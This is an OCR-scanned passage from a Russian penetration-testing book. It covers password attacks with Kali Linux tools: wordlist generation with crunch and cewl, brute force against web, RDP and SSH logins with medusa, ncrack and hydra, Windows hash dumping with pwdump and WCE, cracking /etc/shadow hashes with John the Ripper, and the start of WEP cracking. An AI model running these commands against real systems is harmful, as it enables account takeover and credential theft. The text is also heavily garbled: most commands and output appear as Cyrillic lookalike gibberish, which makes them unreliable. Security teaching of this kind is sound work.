англоговорящими специалистами. Мы более чем уверены в том, что, например, 
в России такие пароли, как «тайЬсѵ/» или «Ьооіегз», не будут пользоваться особой 
популярностью. Зато пароли «кгазоіка» и «сЬеЪигек» можно встретить довольно 
часто. 

Очень часто пользователи используют для создания паролей название своей про¬ 
фессии, дату рождения или название организации. Поэтому в некоторых случаях 
самостоятельно созданный список паролей будет намного лучше найденных 
в Интернете. 

Разумеется, создать вручную список хотя бы из 1000 паролей — задача довольно 
сложная. Рассмотрим способы автоматизации этого процесса. 

СшпсЬ — утилита, входящая в состав Каіі 15них. Она может генерировать списки 
слов, основываясь на заданных пользователем правилах. 

Приведем несколько примеров ее использования. Предположим, что мы замети¬ 
ли, как человек вводит пароль. Нам удалось запомнить, что он использует только 
маленькие латинские буквы гді уш в количестве от шести до девяти. 

гоо1@ка1і:~# сгипсН 6 9 г@1уи5 -о разз.іхі 

СгипсН иііі поіл/ §епега!е ІНе Го11оміп§ атоипі оТ сіаіа: 118459584 Ьуіеа 
112 МВ 
0 6В 
0 ТВ 
0 РВ 

СгипсН иііі пом §епега!е ІНе Го11оміп§ питЬег оТ Ііпез: 12083904 

СгипсЬ позволяет генерировать пароли по определенному шаблону. Для этого ис¬ 
пользуются специальные операторы: @ — строчные буквы,, — прописные буквы, 
% — цифры, Л — специальные символы. 

Зачастую бывает так, что администратор на предприятии для простоты запоми¬ 
нания использует одну и ту же типовую конструкцию для всех серверов. Пред¬ 
положим, что его пароли всегда начинаются с заглавной буквы, содержат четыре 
строчные буквы и четыре цифры. 

гоо1@ка1і:~# сгипсН 9 9-1 ,@@@@%%%% 

СгипсН иііі пом §епега!е ІНе Го11оміп§ атоипі о! сіаіа : 1188137600000 Ьуіез 
1133096 МВ 
1106 6В 
1 ТВ 
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0 РВ 

Сгипсіі иііі пом зепегаТе і;Ие Го11оміп§ питЬег оГ Ипез: 118813760000 

Ааааа0000 

Ааааа0001 

Ааааа0002 

Ааааа0003 

Ааааа0004 

Ааааа0005 

Ааааа0006 

Ааааа0007 


Или же, зная политику безопасности компании хотя бы в отношении паролей, 
можно создать список из строк, содержащих, например, девять символов, одну 
заглавную букву и одну цифру. 

Второй способ создания собственного, персонализированного списка паролей — это 
использование слов и фраз с сайта организации. Для данной цели можно исполь¬ 
зовать инструмент под названием сеѵѵі, который также входит в состав Каіі Ілніх. 

гоо1@ка1і:~# семі -м аи_§оѵ.1:х1: -сі 6 -ш 7 аи-§оѵ.1:ѵ 

СеІлМ_ 5.2 (5оте СРіаоз) КоЬіп ІлІоосІ (гоЬіп@сіі§і .піи^а) (Ыііірз://сІі§і.піпда/) 

В данном случае утилита будет уходить максимум на шесть страниц в глубь сайта 
и искать слова длиной минимум в семь символов. Все результаты работы будут 
записаны в файл. 

гоо1:@ка1і:~# саТ аи_§оѵ.1:х1: 

КеуЬоагсІ 

гіеГегтіпесі 

те55іп§ 

теззесі 

ІгоиЫезРюоІіп^ 
асгопутп 
Т ДЕТАЛИ. 

І_аипсІі 

5(іорріп§ 

аресіаіігаііоп 

ехргеззесі 

сотГогІаЫу 

Помета 

гераігесі 

Маіп1;аіпіп§ 

5ресіа1І2Іп§ 

іпсотреіепі: 

моггуіп§ 

регтіііз 

§гапсІта 

ОССЭ5ІОП 

р1и§§есі 

гепемесі 

Ьагеіу 

сопсегпесі 
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Однако просто создать список паролей, основываясь на данных одного сайта, будет 
неэффективно. Если вы откроете любой список паролей, то увидите, что пользова¬ 
тели очень часто добавляют к паролям цифры. Это может быть год рождения лю¬ 
бимой собаки, номер текущего месяца или даже количество выпитых кружек кофе. 

Для модификации полученных на предыдущем шаге паролей воспользуемся про¬ 
граммой .ІоЬп іЬе Кіррег. 

Чтобы изменить параметры работы данной программы, вначале придется отредак¬ 
тировать конфигурационный файл таким образом, чтобы она добавляла две цифры 
к каждому паролю из созданного списка. Добавим в конец файла /сСсДоЬпДоЬп. 
сои Г правило, следуя которому программа будет добавлять по две цифры в конце 
каждого пароля. 

[ІЛзТ . Киіег : АсісШит] 

$[0-9]$[0-9] 

гоо1:@ка1і :~# саГ ]оНп - -могсііізі: /гоо1:/аи_§оѵ.Тхі --зГсіоиІ; --гиіезгАсІсМит > /гооГ/ 
ге_аи_§оѵ.1:х1: 

МОГСІ5: 84567 Ііте:0:00:00:00 РСМЕ (Тие Осѣ 15 18:15:25 2016) м/з: 2242К 

сиггегЦ: Рго§гаттіп§99 

гоо1:@ка1і:~# саі /гоо1:/ге_аи_§оѵ.1:х1: 

АеЬс5иррог1:25 

АеЬсзиррогТгб 

АеЬс5иррог1:27 

АеЬс5иррог1:28 

АеЬсзирропГгэ 

АеЬсзиррогГЗѲ 


Так что же лучше? С одной стороны, метод простого перебора найдет пароль с веро¬ 
ятностью 100%. А с другой стороны, для того, чтобы подобрать пароль «кгазоіка», 
возможно, придется перебрать 1 562 275 возможных комбинаций. И это с учетом 
того, что мы подбираем пароль из восьми маленьких букв латинского алфавита без 
цифр и специальных символов. 


Онлайн-атаки 

Теперь, когда мы разобрались с общими принципами, перейдем к практике. Итак, 
онлайн-атаки направлены прежде всего на подбор паролей к сервисам, обеспечива¬ 
ющим удаленную аутентификацию. Это могут быть веб-приложения, 55Н, 5МТР, 
ЕТР и другие сервисы. 

Сразу же стоит упомянуть о рисках таких атак. Как вы поняли из предыдущей гла¬ 
вы, перебор паролей по словарю, не говоря уже о прямом переборе паролей, — это 
процесс, которой может потребовать достаточно много времени и не одну сотню по¬ 
пыток. Современные системы защиты очень быстро отреагируют на сотню-другую 
попыток аутентификации одного и того же пользователя за короткий промежуток 
времени и, в лучшем случае, просто заблокируют ІР-адрес атакующего. Также 
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не стоит забывать и о том, что почти все системы блокируют пользователя в том 
случае, если он ввел неверный пароль более трех или пяти раз. 

Также необходимо правильно выбрать цель для атаки. Например, атака на такой 
сервис, как КИР, займет больше времени. Это связано с тем, что вам придется 
подбирать только один пароль за сессию и вы не сможете делать это в несколько 
потоков. Зато, подобрав пароль к КИР, — хоть это и займет больше времени, — вы 
получите больше возможностей и свободы действий в будущем, нежели чем в слу¬ 
чае с веб-приложением. 

Мейияа. Является многофункциональным приложением для перебора паролей 
с поддержкой подключаемых модулей и возможностью запуска нескольких па¬ 
раллельных потоков. 

гооГ@ка1і:~/ тесіиза -Ь ими.тусогр.сош -5 -р /гооГ/ОоситепГ5/500-раззмогсІ5 .ГхГ -М 
ШГр -т ЭІК : /асітіпізГгаГог -Т 10 -и асітіп 

Месіиза ѵ2.2 [ШГр://мми.ГооГиз.пеГ] (С) ЗоМо-Кип / РооГиз ІМеГмогкз <;]'тк@ГооГи5. пеГ> 

АССОШТ СНЕСК: [ШГр] НозГ: иі«м. тусогр.сош (1 о-р 1, 0 сотрІеГе) ІЗзег: асітіп (1 оГ 
1, 0 сотрІеГе) РаззмогсІ: 123456 (1 о-р 1 сотрІеГе) 

АССОШТ Р01№: [ШГр] НозГ: ты. тусогр.сош ІЗзег: асітіп РаззмогсІ: 123456 [51ІССЕ55] 

В данном примере мы совершили атаку на сайт под управлением СМ3 (оопііа. В 
качестве параметров мы указали хост, местонахождение формы для ввода логина 
и пароля, а также сам логин и то, что соединение будет происходить с использо¬ 
ванием ЗЗЬ. 

Мсгаск. Эта программа — один из самых лучших и эффективных инструментов 
для перебора паролей через КЭР. 

гооГ@ка1і:~# псгаск -ѵѵ --изег ѵазз'а -Р /гооГ/ОоситепГ5/500-раззілюгсІ5 .ГхГ 
гсІр://192.168.0.10 

5ГагГіп§ кісгаск 0.5 ( ШГр://псгаск.ог§ ) аГ 2016-11-06 06:20 Е5Т 
РізсоѵегесІ сгесіепгіаіз оп гсір:// 192.168.0.10:3389 'ѵазз'а' '121212' 

Нусіга. Один из мощнейших инструментов для перебора паролей к онлайн-серви- 
сам. Имеет большой набор функций и поддерживает множество протоколов. 

гооГ@ка1і:~# Нусіга -1 гооГ -Р /гооГ/Ооип1оасІ5/500-ра55иогсІ5.ГхГ 127.0.0.1 55Н 
Нусіга ѵ8.3 (с) 2016 Ьу ѵап Наизег/ТНС - Ріеазе сіо по! изе іп тіІіГагу ог 5есгеГ 
зегѵісе ог@апігаГіопз, ог Гог І11е@а1 ригрозез. 

Нусіга (НГГр://і«іми.ГІіс.ог§/ГІіс-ІіусІга) 5ГагГіп§ аГ 2016-11-06 06:28:13 
[НАРШИС] Мапу 55Н сопГі§игаГіопз ІітіГ ГНе питЬег оГ рагаііеі Газкз, ІГ із 
гесоттепсіесі Го гесіисе ГНе Гаэкз: изе -Г 4 

[ОАТА] шах 16 Гаэкз рег 1 зегѵег, оѵегаіі 64 Газкз, 500 1о§іп Ггіез (1:1/р:500), ~Ѳ 
Ггіе5 рег Газк 

[ОАТА] аГГаскіп§ зегѵісе ззГі оп рогГ 22 

[5ТАТІІ5] 256.00 Ггіез/тіп, 256 Ггіез іп 00:01Н, 244 Го сіо іп 00:01Гі16 асГіѵе 
[5ТАТІІ5] 248.00 Ггіез/тіп, 496 Ггіез іп 00:02Н, 4 Го сіо іп 00:01Н, 16 асГіѵе 
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Офлайн-атаки 

Логично, что если пользователь может авторизоваться в системе, используя логин 
и пароль, то эти данные должны где-то храниться, а также то, что они должны там 
находиться в защищенном виде. 

В разных системах пароли хранятся в разных местах. Если это веб-приложение, 
то в базе данных, а если это ОС \Ѵіпс1о\ѵ8, то, в зависимости от версии, логины 
и пароли хранятся в ЗАМ-базе данных с использованием ЬМ- или ЕГГЕМ-хешей. 

Хранение паролей с использованием ЬМ осуществлялось во всей линейке КТ, 
включая \Ѵіпс1о\ѵ8 2003. Этот тип хранения данных имеет ряд недостатков. Пароли 
длиннее семи символов разбиваются на части, и каждая часть хешируется и хра¬ 
нится отдельно, все пароли конвертируются, все строчные буквы конвертируются 
в прописные, не используется «соль». 

Во всех версиях \Ѵтс1о\ѵз, начиная с Ѵізіа, пароли хранятся в более надежном 
виде — КТЕМ. Однако «соль» тут также не используется. 

Поскольку операционная система сконструирована так, чтобы не выдать пароли 
злоумышленнику, ЗАМ-база данных не может быть скопирована, пока она запуще¬ 
на. Однако есть несколько типов атак, которые направлены на то, чтобы достать из 
оперативной памяти хеши паролей. 

Один из способов — это обратиться к паролям не напрямую, а заставить ЬЗАЗЗ- 
сервис, у которого есть право доступа к хешам, выдать его нам. фсішпр и р\ѵс1итр — 
две утилиты, которые и реализуют данный метод. 

Результат работы Циагкз РѵѵПшпр (рѵѵсішпр, оптимизированный под ѴѴіпсІоѵѵ.з ХР 
/ 2003 / ѴізЕа / 7 / 2008 / 8): 

[+] 5Ѵ5КЕѴ ге$1:гіеѵіп§. . . [ОК] 

5Ѵ5КЕѴ = Е9В4Е95ВОР9О197039АВ54РОСС5ВА416 

[+] Іпіі: ЗЕТ еп§іпе...ОК 

[+] Ореп ОаТаЬаае с: \п1:сІ5 .сИТ...ОК 

[+] Раг5іп§ (ЗаТаТаЫе.. .ОК 

[+] Ргосе55іп§ РЕК сіесірИегіп§. . .ОК 

РЕК = Е93ОЕ155ЕО07ОЕВЕ17О0В73ОР23056ЕР 

[ + ] Ргосе55іп§ ИазРіез сІесірИегіп§. . .ОК 

- ВЕбШ РІДЧР - 

АсітіпІІаег : 1106: ААОЗВ435В51404ЕЕААОЗВ435В51404ЕЕ : 520126А03Р5О5А8О836Р1С4Р34ЕРЕ7СЕ : : : 
ІІ5ѲГТЕ5Т :1104: ААОЗВ435В51404ЕЕААОЗВ435В51404ЕЕ:РВОСО5041С96ООВО82224270В57Р11РС::: 
СиеаТ : 501: ААОЗВ435В51404ЕЕААОЗВ435В51404ЕЕ : ЗШ6СРЕ0О16АЕ931В73С59О7Е0С089С0: : : 
АсітІПІаТгаТог :500:ААОЗВ435В51404ЕЕААОЗВ435В51404ЕЕ:161СРР084477РЕ596А5ОВ8187449 
8А24::: 

- ЕМО 0иМ р - 

4 сіитресі ассоипТз 

[+] СІ05Ѳ ОаТаЬазе...ОК 

Еще один интересный инструмент, предназначенный для той же цели, — \Ѵшс1о\ѵз 
СгесІепНаІз Нсіііог (\ѴСЕ). Он может не только осуществлять ПкПиігьскции, но 
и напрямую обращаться к ЕЗАЗЗ-процессу. 
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С:\>исе.ехе -1 

Іл/СЕ ѵі.1 (ІлІіпсіом5 СгесІепТіаІг ЕсііГог) - (с) 2010,2011 Атрііа БесигіГу - Ьу Негпап 
ОсЕіоа (НегпапіЭатрІіазесигіСу. сот) 

ІІ5е -И Гог Ііеір. 

ТЕ5Т51І5ЕК$:ОС:00000000000000000000000000000000:А46Р7А860148АСО36Е16СО7СЕ0ОВ05Е7 асіт 
іп : ОС: 921988ВА00ЮС8Е1Е96Е275Е1115В16Е : С9АВ9О08СС7ОА5А55О8А82О869Е01ЕА8 изег:ОС:921 
988ВА00ЮС8Е14АЗВ108ЕЗЕА6СВ6О: Е19ССЕ75ЕЕ54Е06В06А5907АЕ13СЕЕ42 АсІтіпізГгаГог: ОС: 921 
988ВА00ЮС8Е138Р10713В629В565: АЕ974876О974АВО805А989ЕВЕАО868 
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Итак, нам удалось добыть хеши паролей. Для начала разберемся, что же это такое. 
Хеш — это одностороннее шифрование. Более точно — это процесс, в результате 
которого пользователь получает строку символов определенного размера и не мо¬ 
жет трансформировать ее назад в исходные данные. Такая возможность не преду¬ 
смотрена по определению. 

В большинстве случаев хеш используют для проверки целостности информации, 
а также для проверки паролей. Во время аутентификации пользователь вводит 
пароль, затем система вычисляет из него хеш и сравнивает его с хешем из своей 
базы данных. 

При взломе хеша одной из самых важных задач является определение алгоритма, 
по которому он был сгенерирован. Дальше все просто: генерируется пароль, вы¬ 
числяется хеш, и если они совпадают, то сгенерированный пароль был верным. 

Зачастую это на самом деле непосильная задача. При анализе хеша обычно смотрят 
на его длину и используемые символы. 

Для облегчения задачи можно использовать утилиту ЬазЬ-кІстПіГісг. 

гооГ@ка1і:~# ИазИ-ісІепГІГіег 

НА5Н: 200сеЬ26807сІ6ЬГ99Гсі6Г4Г0с11са54сі4 

Ро55ІЬ1е На$(і5: 

[+] МЭ5 

[+] Эотаіп СасНесІ СгесІепГіаІз - МЭ4(№4( ($ра55)). (5ГгГо1омег($и5егпате))) 

ЕеазГ РоззіЫе НазМз: 


[+] 

КАсІтіп ѵ2.х 

[+] 

МИМ 

[+] 

МЭ4 

[+] 

МЭ2 

[+] 

МЭ5(НМАС) 


Но узнать алгоритм, по которому был сгенерирован хеш, мало — мы не сможем 
авторизоваться в системе, имея только эти данные. Нам нужен сам пароль. 

В этом нам может помочь ,|о1т і ііс Кіррег. Эта программа — как армейский нож, 
только работающий с паролями. Она поддерживает огромное количество форматов 
и постоянно обновляется. 
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Попробуем запустить ее для перебора паролей к хешам, которые мы нашли 
раньше: 

гооТ@каіі:~# ^оИп /гооТ/ЬазЬ.ТхТ 

ІлІагпіп§: сіеТесТесі Иазіт Туре "І_М", ЬиТ ТЬе зТгіп§ із аізо гесо§пігесі аз "МТ" 

ІІзе ТЬе "--ТогтаТ=МТ" орТіоп То Гогсе 1оасІіп§ ТЬезе аз ТМаТ Туре іпзТеасІ 
ІлІагпіп§: сіеТесТесі Иазіт Туре "І_М", ЬиТ ТЬе зТгіп§ із аізо гесо§пігесі аз 
"НАѴАТ-128-4" 

ІІзе ТМе "---РогтаТ=НАѴАІ.-128-4" орТіоп То Гогсе 1оасІіп§ ТЬезе аз ТЬаТ Туре ІпзТеасІ 

ТоасІесІ 6 раззмогсі ЬазЬез міТЬ по сііГ-РегепТ заІТз (І_М [РЕ5 128/128 55Е2]) 

Ргезз ’л' ог СТгІ-С То аЬогТ, аітозт апу оТЬег кеу Тог зТаТиз 

(оііп (Ье Кіррег сразу определил тип хеша и начал подбирать пароли. Однако на 
обычном компьютере это займет достаточно много времени. Используем для этих 
целей список с паролями: 

гооТ@ка1і:~# ]оНп --могсИІ5Т=/гооТ/ОоситепТз/500-ра55могсІ5.ТхТ /гооТ/ЬазЬ.ТхТ 
-■РогтаТ=Каи-М05 

ТоасІесІ 3 раззмогсі ЬазЬез міТЬ по сііТ-РегепТ заІТз (Кам-МЭ5 [МЭ5 128/128 55Е2 4x3]) 
Ргезз 'л' ог СТгІ-С То аЬогТ, аітозт апу оТЬег кеу Тог зТаТиз 
123456 (?) 

Ьеег (?) 

2% 0:00:00:00 ЭОІЧЕ (2016-11-06 08:06) 40.00§/з 10020р/з 10020с/з 16260С/3 гиззіа.. 
аІЬегТ 

ІІзе ТЬе "--зЬом" орТіоп То сіізріау аіі оТ ТИе сгаскесі раззмогсіз геІіаЬІу 
Зеззіоп сотрІеТесі 

Теперь осталось разобраться только с паролями ОС Ьіпих. Для того чтобы начать 
подбирать пароли к хешам Ьіішх, необходимо объединить файлы раззтѵсі и зЬас1о\ѵ 
при помощи утилиты ишЬасІотѵ. 

гооТ@ка1і:~# ипзЬасіом /еТс/раззмсІ /еТс/зЬасіом > /гооТ/и_зЬас!ои.ТхТ 
гооТ@ка1і:~# саТ и_зЬасіом.ТхТ 

гооТ : $6$2ТВТпіВѴ$ЭНу/6а/09есіЫ(2232/()кЫоЬ51ІШГІІЬМ28().ТВРѴт6ух55О. иКмЬ511Т1А7Т25Імк8Ѵ 

ІмЬЗІХхѴгХЫІхІІЗІѵкІ:0:0: гооТ :/гооТ:/Ьіп/ЬазЬ 

сіаетоп: *: 1:1: сіаетоп :/изг/зЫп: /изг/зЬіп/по1о§іп 

Ьіп:*:2:2:Ьіп:/Ьіп:/изг/зЬіп/по1о§іп 

зуз: *: 3:3: зуз: /Ьеѵ:/изг/5Ьіп/по1о§іп 

зупс : * :4:65534: зупс : /Ьіп :/Ып/зупс 

§атез:*:5:60:@атез:/изг/§атез:/изг/зЬіп/по1о§іп 

тап:*: 6:12:тап:/ѵаг/сасЬе/тап:/изг/зЬіп/по1о§іп 

1р:*:7:7:1р: /ѵаг/зрооі/ірсі: /изг/зЬіп/по1о§іп 

таіі:*:8:8:таі1:/ѵаг/таі1:/изг/зЬіп/по1о§іп 


И аналогичным образом запускаем ,|оЬп іЬс Кіррег: 

гооТ@ка1і:~# ^оИп --могсІ1і5Т=/гооТ/ОоситепТ5/500-ра55могсІ5 .ТхТ /гооТ/и_зЬас!ои.ТхТ 
Іліагпіп§: сіеТесТесі ЬазЬ Туре "зЬа512сгурТ", ЬиТ ТЬе зТгіп§ із аізо гесо§пігесі аз 
"сгурТ" 

ІІзе ТЬе "--ТогтаТ=сгурТ" орТіоп То Тогсе 1оасііп§ ТЬезе аз ТЬаТ Туре ІпзТеасІ 
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ЬоасіесІ 1 раззідюгсі ИазИ (5Ііа512сгурТ, сгурГ(З) $6$ [5НА512 128/128 55Е2 2х]) 

Ргѳ55 'я' ог СГгІ-С Іо аЬогТ, аітозг апу оТЬег кеу Гог зГаТиз 
Тоог (гооТ) 

1§ 0:00:00:00 РОМЕ (2016-11-06 08:15) 2.564§/з 164.1р/з 164.ІС/5 164.1С/3 123456.. 
ЗОзИиа 

ІІзе ТИе "--зИом" орТіоп Го сіізріау аіі оГ ТЬе сгаскесі раззмогсіз геІіаЬІу 
Зеззіоп сотрІеГесІ 

Радужные таблицы 

Взламывать пароли перебором очень долго. И если вам приходится делать это 
часто, то, не имея нужных мощностей, к моменту подбора вы получите пароль, 
уже ставший неактуальным. Гораздо проще сразу сгенерировать таблицу хешей 
и паролей. Да, она займет огромное количество места, зато потом поиск пароля по 
хешу будет происходить молниеносно. Такие сгенерированные заранее базы данных 
и называют радужными таблицами (гаіпсіогѵ ГаЪеІез). 


СгаскБйЛіоп - Опііпе Раззѵ/огй НазЬ Сгаскіпд - МР5. 5НА1, Ыпих. КаіпЬоѵѵ ТаЫе5, е*с. - Моііііа РігеГох ООО 


щ) СгаскЫайоп Опііпе ... х + 

(+ )фй ьяр 5 ://сгаск 5 ІаІіоп.пеІ 


С О. 5 еагсЬ 


й Й © -О- Й = 


Оеіизе.са ■ ^0 ТМПег 


СгаскБіаіІоп ^ Раззѵѵогй Назіііпд Бссипіу ^ Осіизс бссигпу 


Ргее Раззѵѵогс] НизЬ Сгаскег 


Епсег ир ю 20 поп-ваііео пазпев, опе рог мое: 


206 сеЬ 26807 іібЬ Г 99 Г(І 6 Г 4 Г Ѳсі1са54іі4 



ьирропз: і_м, NI ьм, таг, тйД, таъ, твь{т«>_пех), таъ-пап, вімі, «па224, згш2ъь, зЛаіИ4, іімьд греМШШ, ѵѵімрооі, муьдид.і* (впаі(вГіаі_імп); 

нави Туре Кевин 


гоѳсеьгбвотгібьт^сібшѳслсаз-ш 


пкІЗ агіюіпіБІгаТог 


Со Іо г Согіех; Огсеп: Ехосі тпоІсЬ Уект: РогГиІ гтмІсЬ. ВЯ N0! (оигхі 


Рис. 6.1. Пример использования радужной таблицы 


В Интернете можно найти заранее сгенерированные таблицы, скачать их и исполь¬ 
зовать на своем компьютере или же воспользоваться онлайн-версией. 
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Резюме 

До сих пор для авторизации пользователей большая часть ИС использует пару 
логин и пароль. Есть несколько способов взлома паролей, один из них — подбор. 

Подбор паролей: 

□ В связи с трудоемкостью процесса осуществляется при помощи специального 

ПО. 

□ Перебор всех возможных комбинаций — самый надежный и наиболее требова¬ 
тельный ко времени метод. Учтите, что современные системы обычно блокиру¬ 
ют пользователя после трех-пяти неудачных попыток. 

□ Можно подбирать пароли, используя списки. Списки можно генерировать само¬ 
стоятельно, используя определенные шаблоны или, например, ключевые слова 
с сайта целевой системы. Готовые списки можно найти в Сети. Этот способ более 
быстрый, но менее надежный. 

Пароли редко хранятся в открытом виде, в подавляющем большинстве они за¬ 
писаны в виде хешей. Хеш — результат работы функции, преобразующей входные 
данные в строку определенной длины. Хеши паролей хранятся в файлах и базах 
данных. Из хеша нельзя получить пароль, только перебором можно подобрать па¬ 
роль с таким же хешем. Для разных паролей не может существовать одинаковых 
хешей (в современных алгоритмах). Для перебора необходимо вначале установить 
тип алгоритма, с помощью которого получен данный хеш. Все это делается с ис¬ 
пользованием специального ПО, например .ІоЬп гііе Шррег. Также для этих целей 
можно использовать радужные таблицы. 



Беспроводные сети 


С момента появления беспроводных сетей прошло относительно немного вре¬ 
мени, но они сразу же завоевали огромную популярность, и с каждым днем 
сфера их применения только растет. Желание пользователей становиться более 
мобильными, не быть привязанными к определенному рабочему месту, а также 
требования современных бизнес-процессов только усиливают их распростране¬ 
ние. Беспроводные сети расширяют границы и позволяют пользователям под¬ 
ключаться к различным ресурсам в таких местах, где раньше этой возможности 
не было даже в теории. 

Мы рассмотрим два вида беспроводных сетей — \Ѵі-Рі и НІшДооІі. Хотя они и от¬ 
личаются, однако с точки зрения информационной безопасности подвержены 
одинаковым рискам. В современном мире ВІиеіооЬ используется для связи друг 
с другом мобильных телефонов, планшетов, беспроводных клавиатур и многих 
других устройств. Достаточно только представить, сколько различной информации 
хранят пользователи на своих мобильных устройствах, чтобы понять, насколько 
велики риски, связанные с утечкой таких данных. 


Краткий обзор ѴѴі-Рі 

\Ѵі-Рі — это тип беспроводной передачи данных, который описан в стандарте 
ІЕЕЕ 802.11. Эта технология передачи данных используется практически во всех 
устройствах, от мобильных телефонов до персональных компьютеров и игровых 
консолей. Благодаря этой технологии пользователи могут подключать различные 
устройства к глобальной или локальной сети. 

Для связи устройства с глобальной сетью необходима так называемая точка до¬ 
ступа. Существует два основных типа точек доступа: 

1. На основе аппаратных средств. Обычно это отдельно стоящий беспроводной 
роутер, открытый для подключения пользователей. 

2. На основе программных средств. Также открыт для подключения пользователей 
по беспроводной сети, однако может включать в себя множество точек доступа. 
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Это позволяет пользователям передвигаться от зоны действия одной точки 
к зоне действия другой без потери сигнала и необходимости переподключения 
к сети. 

Беспроводные сети также используются для связи локальных сетей. Например, ког¬ 
да два офиса организации разделены регионально, вместо того, чтобы использовать 
проводные магистрали, можно связать их, используя беспроводные технологии 
типа БАМ-Іо-БАМ. 

Существует несколько стандартов передачи данных, которые отличаются макси¬ 
мальной скоростью передачи информации, частотой и радиусом действия. Следует 
заметить, что максимальная скорость и радиус достижимы лишь в идеальных ус¬ 
ловиях, которые в реальной жизни практически не встречаются. 


Протокол 

Частота, 

ГГц 

Дальность, 

м 

Максимальная скорость 
передачи данных, 

Мб/с 

ВІиеіооіЬ 

2,4 

10 

1-3 

802.11а 

5 

22 

54 

802.11Б 

2,4 

45 

И 

802.11§ 

2,4 

45 

54 

802.11п 

2,4 или 5 

30 

600 (теоретически) 

802. Пас 

5 

48 280 

1,3 Гбит/с 


Ввиду того что в определенном месте устройство пользователя может принимать 
сигнал от различных точек доступа, их необходимо идентифицировать. Для это¬ 
го для каждой сети конфигурируют идентификатор (55ГО). Если он отрытый, 
то каждый пользователь может его увидеть, но это не значит, что у него будет 
возможность подключиться к такой сети. Однако 55Ш может быть скрытым, 
и в этом случае пользователь не сможет его увидеть, даже если будет находиться 
в зоне действия такой сети. Для подключения к такой сети ему придется ввести 
55Ш вручную. 

Итак, мы плавно перемещаемся к вопросу аутентификации. Есть два основных 
метода. Первый, и самый простой, — это открытая сеть. Такие чаще всего устанав¬ 
ливаются в кафе, ресторанах или неопытными пользователями у себя дома. При 
подключении к такой сети устройство клиента посылает запрос точке доступа, она 
сравнивает 8811) и, в случае его совпадения с ее собственным, отправляет клиенту 
подтверждение, тем самым разрешая подключение. 

Второй тип основывается на общедоступных ключах. В этом случае клиент посы¬ 
лает точке запрос на аутентификацию, а точка отправляет ему специальный пакет. 
Клиент, используя заранее сконфигурированный общедоступный ключ, шифрует 
пакет и отправляет его назад. Если точка доступа сможет его расшифровать, ис¬ 
пользуя тот же ключ, то клиент получает разрешение на доступ в сеть. 
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Последнее, что нам осталось рассмотреть, прежде чем мы перейдем к вопросам 
безопасности, — это шифрование. В отличие от проводной сети, где мы знаем 
точное место прохождения кабелей и можем контролировать доступ к ним, в слу¬ 
чае с беспроводными сетями эта задача становится достаточно сложной. Даже 
если доступ в помещения организации будет строго ограничен, поймать сиг¬ 
нал беспроводной сети можно за пределами зоны контроля, оставаясь при этом 
совершенно незамеченным и получить доступ ко всем передаваемым данным. 

Для того чтобы уменьшить риски, связанные с возможным перехватом данных, 
вся информация шифруется. Рассмотрим ближе основные методы шифрования 
данных: 

1. \Ѵ I: Р — самый старый и уязвимый из протоколов. Он был внедрен на заре бес¬ 
проводных сетей и очень скоро был скомпрометирован. Однако до сих пор все 
роутеры поддерживают его, и можно найти сети, в которых он используется по 
умолчанию. 

2. \ѴРА — создан на основе \ѴЕР. В этом протоколе были исправлены многие 
недочеты его предшественника. Использует усовершенствованную систему 
шифрования и аутентификации. 

3. ѴѴРА2 — создан на основе \ѴРА и впоследствии должен заменить его. В нем ис¬ 
пользуется шифрование АЕ5 и реализована поддержка ССМР (СоипГег Мосіс 
\ѵйЬ СірЬег Віоск С1іаіпіп§ Мезза§е АиГЬепНсаГіоп Собе Ргоіосоі). 


ѴѴЕР 


Несмотря на то что \ѴЕР является устаревшим стандартом, он все еще использу¬ 
ется в некоторых системах, поэтому остановимся на нем подробнее. 

Впервые этот протокол был представлен вместе со стандартом 802.11Ь и должен 
был обеспечить такой же уровень безопасности, как и в проводных сетях. Он ис¬ 
пользует потоковый шифр К.С4. 

Основными задачами данного протокола были: предотвращение перехвата дан¬ 
ных, обеспечение проверки целостности данных и использования общедоступного 
ключа для шифрования данных перед передачей, а также конфиденциальности 
и эффективности. Но, к сожалению, со своими задачами он справился недостаточно 
хорошо. 

Разберемся с уязвимостями данного протокола: 

□ использование СК.С32 для проверки целостности данных, что позволяет неза¬ 
метно манипулировать пакетами с данными; 

□ использование векторов инициализации длиной всего в 24 бита — это озна¬ 
чает, что при интенсивной нагрузке на сеть их все можно собрать примерно 
за 5 часов; 
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□ ключи могут быть обнаружены при анализе пакетов; 

□ подвержен атакам типа «отказ в обслуживании». 

Теперь рассмотрим сам процесс получения ключей. Основной частью взлома яв¬ 
ляется сбор векторов инициализации, что осуществляется при помощи перехвата 
пакетов. Собрав нужное их количество, можно будет приступить к анализу. Есть 
один важный принцип: чем больше будет собрано пакетов, тем проще их проана¬ 
лизировать. Однако тут есть одна проблема — время. Сбор пакетов может занять 
достаточное количество времени, особенно если сеть не используется активно. 
Одним из приемов, применяющихся для обхода этого ограничения, является 
отправка атакующим специально сформированных пакетов, что создает нужное 
количество трафика. 

Рассмотрим взлом такой сети с использованием инструментов, доступных в Каіі 
Ьіпих. 

Прежде чем начать, необходимо учесть, что стандартный драйвер для ЛѴі-Гі- 
адаптера не позволит собирать нужные данные. Для этого нужен модифицирован¬ 
ный драйвер. К счастью, для многих адаптеров они существуют, входят в состав Каіі 
Ьіпих и не требуют отдельной установки. Однако можно столкнуться с ситуацией, 
когда сниффинг на выбранном адаптере будет невозможен. 

Приступим. Вначале определим, какие \Ѵі-Рі-адаптеры нам доступны, выберем сре¬ 
ди них подходящий и запустим на нем мониторинг. После этого ліппоп-пд создаст 
новый интерфейс, с которым мы и будем работать дальше. 

гооР@ка1і :~# аігтоп-п§ 

РНѴ ІпРегРасе Эгіѵег СРіірзеР 

рріу0 м1ап0 ІИІ3945 ІпРеІ СогрогаРіоп РКО/ЫігеІезз 3945АВ6 [Соіап] 

(геѵ 02) 


гооР@ка1і:~# аігтоп-п§ зРагР м1ап0 

Роипсі 2 ргосеззез РРіаР соиісі саизе РгоиЫе. 

ІР аігосІитр-п§, аігер1ау-п§ ог аігРип-п§ зРорз могкіп§ аРРег 
а 5 ИогТ: регіосі оР Ріте, уои тау іліапР Ро гип 'аігтоп-п§ сііеск кііі' 

РЮ ІМате 

1125 ИеРмогкМапа^ег 
1226 мра_зирр1ісапР 

РНѴ ІпРегРасе Ргіѵег СРіірзеР 

рріу0 м1ап0 іід/13945 ІпРеІ СогрогаРіоп РКО/ЫігеІезз 3945АВС [Соіап] 

(геѵ 02) 


(тас80211 топіРог тосіе ѵіР епаЫесІ Рог [рИу0]м1ап0 оп [рІіу0]м1ап0топ) 
